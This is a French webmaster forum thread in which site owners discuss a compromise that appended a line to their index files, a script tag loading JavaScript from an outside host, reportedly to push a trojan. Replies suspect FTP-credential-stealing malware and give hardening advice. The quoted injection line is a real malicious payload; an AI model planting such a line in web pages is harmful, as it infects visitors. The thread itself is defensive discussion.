Aller au contenu

Hack de sites


yuston

Sujets conseillés

Salut.

Je ne sais pas que diable se passe exactement, mais quelques de mes sites ont vu leur fichier index.X (quelque soit l'extension) modifiés, une petite ligne de Javascript ajoutée tout à la fin de chaque fichier:

<script type="text/javascript" src="http://iopap.upperdarby26.com/Template.js"></script>
<!--27b41ae4ab25cc5beba782836e0ec514-->

Pensant au début que c'était une faille dans la mauvaise qualité de ma programmation, il s'avère que c'est peu probable. Je viens d'installer un WordPress 3 histoire de tester les nouveautés (la v.3 est dans les bacs comme on dit :hypocrite: ) sur un serveur neuf que personne connaît. Deux jours plus tard, tous les index de mon WordPress ont été virolés.

Donc je me suis dit que c'est une faille serveur Apache ou je ne sais pas trop, mais après petite recherche, il s'avère que c'est un vers qui vole tous les mots de passe des FTP disponibles sur un PC.

Bref, après avoir sauvegardé les différents fichiers, changé les mots de passe, prié que mes visiteurs n'ont pas été affectés, etc, avez-vous une idée de cette histoire, si c'est réellement mon ordinateur qui a été contaminé ou autre? Si tel est le cas, comment c'est possible? Je suis une personne relativement attentive avec un ordinateur très propre (je tourne qu'avec les logiciels libres et gratuits ou gratuits tout courts donc pas d'insalubrités).

C'est un ordinateur sous XP avec Avira comme antivirus. Que faire? :(

PS: je m'excuse, je ne sais pas où placer mon sujet!

Lien vers le commentaire
Partager sur d’autres sites

Peut être qakbot ou une saleté dans le genre.

La solution bourrinne c'est de tout réinstaller (à commencer par l'OS) et de placer non seulement un bon AV, mais également firewall et antispyware.

Il est bon de ne pas stocker les pass ftp sur sa machine.

Les logiciels libres ou honnêtement acquis ne sont pas exempts de failles

Edit: Certains softs tels que filezilla utilisent un stockage en clair des mdp: c'est plutôt facile pour les malware de les récolter.

Il est également préférable d'utiliser un mode de transfert sécurisé (sftp, ftpes, webdav over ssl...) pour éviter le sniff de password.

Modifié par paolodelmare
Lien vers le commentaire
Partager sur d’autres sites

Salut.

Ah évidemment quand je disais logiciels libres et gratuits, c'était en pensant que mes logiciels ne sont pas issus des sites louches, avec des cracks ou autres saletés.

Sinon, effectué trois scans via des antivirus à jour différents. Aucun virus ou vers détecté.

Est-il possible que ce soit un autre ordinateur du réseau qui serait infecté et qui aspirerait les mots de passes?

Bonne journée (ensoleillée) :)

Lien vers le commentaire
Partager sur d’autres sites

il s'avère que c'est un vers qui vole tous les mots de passe des FTP disponibles sur un PC.
Si ver il y a, tu devrais le voir sur ton PC. Or tu dis que tu n'arrives pas à le détecter. Qu'est-ce qui te faisait penser que c'était un ver ? Ton mot de passe était-il connu ou "devinable" par certaines personnes ?

Jean-Luc

Lien vers le commentaire
Partager sur d’autres sites

Hello yuston,

J'ai eu exactement le même problème, il y a 2 semaines : une ligne de code javascript provoquant le téléchargement d'un trojan (je ne me souviens plus du nom) a été ajouté dans tout les index (php, html...) des différents sites (pas de cms...) de mon entreprise... Le temps que je m'aperçoive de l'attaque (2/3H) et j'ai remplacé tout les index : il n'y a eu aucun dégât auprès de Google... par contre, j'ai rencontré quelques sites (dont un annuaire) possédant le même problème et détecter par mon antivirus/firewall...

L'attaque s'est fait par le biais de l'université de Yale (.....) aux USA : il a fallu moins de 10 minutes pour modifier tout les index des différents sites... Les sites étant hébergés chez OV..., je les ai contacté pour savoir si seuls nos sites avaient été attaqué ou s'il y avait d'autres attaques : a priori, nous étions les seuls à le signaler à l'instant du contact.

L'attaque a été menée comme si nos logins et pwd étaient connus : je les ai, donc, modifiés, rapidement.

Pour connaitre, nos pwd : je n'ai vu que 2 solutions :

- soit une personne a trouvé des traces sur un ordi, que j'ai parfois utilisé et qu'on nous a récemment volé (mais je suis quasi-certain d'avoir supprimé mes traces)...

- soit ils ont été intercepté via filezilla que j'utilise... sur un des ordis que j'utilise, il n'y avait pas la dernière version mais une version tout de même assez récente => je l'ai mise à jour.

Aucun vers / virus ou autre machin-truc n'a été détecté que ce soit au job ou chez moi....

Lien vers le commentaire
Partager sur d’autres sites

Bonsoir.

_AT_Jeanluc, j'ai lu sur d'autres forums et sites (la plupart US) qui parlaient de vers en fait. Ce n'est qu'une simple déduction de ma part, mais, avec mes analyses, je n'ai rien trouvé sur mon ordinateur (privé, personne d'autre y a accès).

Sinon mes mots de passe sont pas devinables.

_AT_Régis, je ne sais pas ce que le code Javascript provoque car je surfe avec Firefox et divers plugins qui virent les scripts non-fiables (sont non-fiables tous ce que je n'ai pas mis manuellement en liste blanche). Par contre, sur un site peu visité, je m'en suis aperçu trop tard: Google a placé l'étiquette "Ce site risque d'endommager votre ordinateur" et donc divers navigateurs affichent un gros message d'avertissement. C'est d'ailleurs comme ça que je me suis aperçu de l'attaque.

Quant à mon client FTP, j'utilise WinSCP, et effectivement j'enregistre mes différents mot de passe pour une connexion automatique... mais ces mots de passe semblent être cryptés dans la base de registre ici: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Mais bref, si mon PC n'est pas incriminé, je ne vois pas comment ils ont réussi à "hacker" mes sites. C'est donc quand même inquiétant... Je m'interroge....

Lien vers le commentaire
Partager sur d’autres sites

Le fait qu'aucun antivirus ne détecte quoi que ce soit n'est pas un gage de sécurité absolue.

Las av utilisent principalement deux méthodes de détection: les empreintes ou signatures des malwares et une détection heuristique, cad basée sur des comportements louches des processus.

Une bestiole telle que qakbot adopte un comportement prudent et n'utilise que des processus légitime pour accéder à ce qui l'intéresse.

Il ne s'agit probablement pas de celui-ci, car les av le détectent désormais, mais un engin du même type pourrait être à l'origine de ton souci.

Il faut vérifier toute la chaine:

  • connexions securisées
  • passwords robustes
  • passwords non stockés
  • check des différents points d'accès à tes hebergements et changement des mdp: ftp, ssh, webdav, interface d'admin de l'hebergeur et cie
  • check des cms et templates utilisés. Certains CMS sont particulièrement vulnérables
  • check de keyloggers sur ta machine. Certaines extensions telles que lazarus pour ff peuvent avoir un usage douteux
  • firewall

  • durcir les permissions
  • durcir la config php (ou autre) cf
  • utiliser une autre machine et un point d'accès
  • reinstall d'os tout neuf, attention aux sauvegardes qui peuvent être infectées.

Bon après si ça persiste, on peut aller loin: scan de vulnerabilité, honeypot...mais là c'est du grand banditisme

Lien vers le commentaire
Partager sur d’autres sites

  • 3 semaines plus tard...

C'est quand même pénible ce genre de chose..il m 'est arrivé la même chose, toute les semaines j' avais droit à un script ajouté dans mes fichiers. J' ai aussi fait des scans et tout le tralala sans jamais rien trouver...alors je me suis résolu à suivre les conseils de paolodelmare, c'est a dire réinstaller l' OS...mais comme ce n 'était qu' un petit site, ce n 'est pas trop grave, mais quand il s' agit d' un vrai business, ca commence a être très grave! :mad2:

Lien vers le commentaire
Partager sur d’autres sites

La plupart de ces vers utilisent des failles applicatives (Adobe reader , flash player, faille windows, etc) pensez donc également à bien mettre à jour l'ensemble de vos logiciels ainsi que vote OS. Beaucoup d'entre eux ont utiliser de fausses publicités flash diffusés par de grandes régies pour se répandre.

J'utilise un logiciel qui s'occupe de vérifier les failles potentielles liées à des applications: PSI (http://secunia.com/vulnerability_scanning/personal/). C'est gratuit et ça permet de centraliser les vérifications.

Après, on peut aussi imaginer se protéger des failles flash par exemple en utilisant des extensions comme flashblock, qui permettent de sélectionner les animations flash que l'on désire activer ou non.

Si vous réinstallez votre système, pensez aussi aux périphériques qui peuvent être infecté (clés usb, disque dur externe ... )

Modifié par K-Ola
Lien vers le commentaire
Partager sur d’autres sites

  • 1 month later...

Hello yuston,

J'ai eu exactement le même problème, il y a 2 semaines : une ligne de code javascript provoquant le téléchargement d'un trojan (je ne me souviens plus du nom) a été ajouté dans tout les index (php, html...) des différents sites (pas de cms...) de mon entreprise... Le temps que je m'aperçoive de l'attaque (2/3H) et j'ai remplacé tout les index : il n'y a eu aucun dégât auprès de Google... par contre, j'ai rencontré quelques sites (dont un annuaire) possédant le même problème et détecter par mon antivirus/firewall...

L'attaque s'est fait par le biais de l'université de Yale (.....) aux USA : il a fallu moins de 10 minutes pour modifier tout les index des différents sites... Les sites étant hébergés chez OV..., je les ai contacté pour savoir si seuls nos sites avaient été attaqué ou s'il y avait d'autres attaques : a priori, nous étions les seuls à le signaler à l'instant du contact.

L'attaque a été menée comme si nos logins et pwd étaient connus : je les ai, donc, modifiés, rapidement.

Pour connaitre, nos pwd : je n'ai vu que 2 solutions :

- soit une personne a trouvé des traces sur un ordi, que j'ai parfois utilisé et qu'on nous a récemment volé (mais je suis quasi-certain d'avoir supprimé mes traces)...

- soit ils ont été intercepté via filezilla que j'utilise... sur un des ordis que j'utilise, il n'y avait pas la dernière version mais une version tout de même assez récente => je l'ai mise à jour.

Aucun vers / virus ou autre machin-truc n'a été détecté que ce soit au job ou chez moi....

Je ressors un peu le sujet pour indiquer que j'ai moi aussi eu un ver de ce type. Après modification de tous mes mots de passe je n'ai plus eu de problème.

J'ai également enlevé l'enregistrement de mes mot de passe dans mon logiciel ftp. Je soupçonne le ver d'utiliser les mots de passe préenregistrés pour se connecter. J'ai installé un anti malware.

Depuis, j'ai installé crawlprotect, ca me fait une protection supplémentaire contre les pirates.

Lien vers le commentaire
Partager sur d’autres sites

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...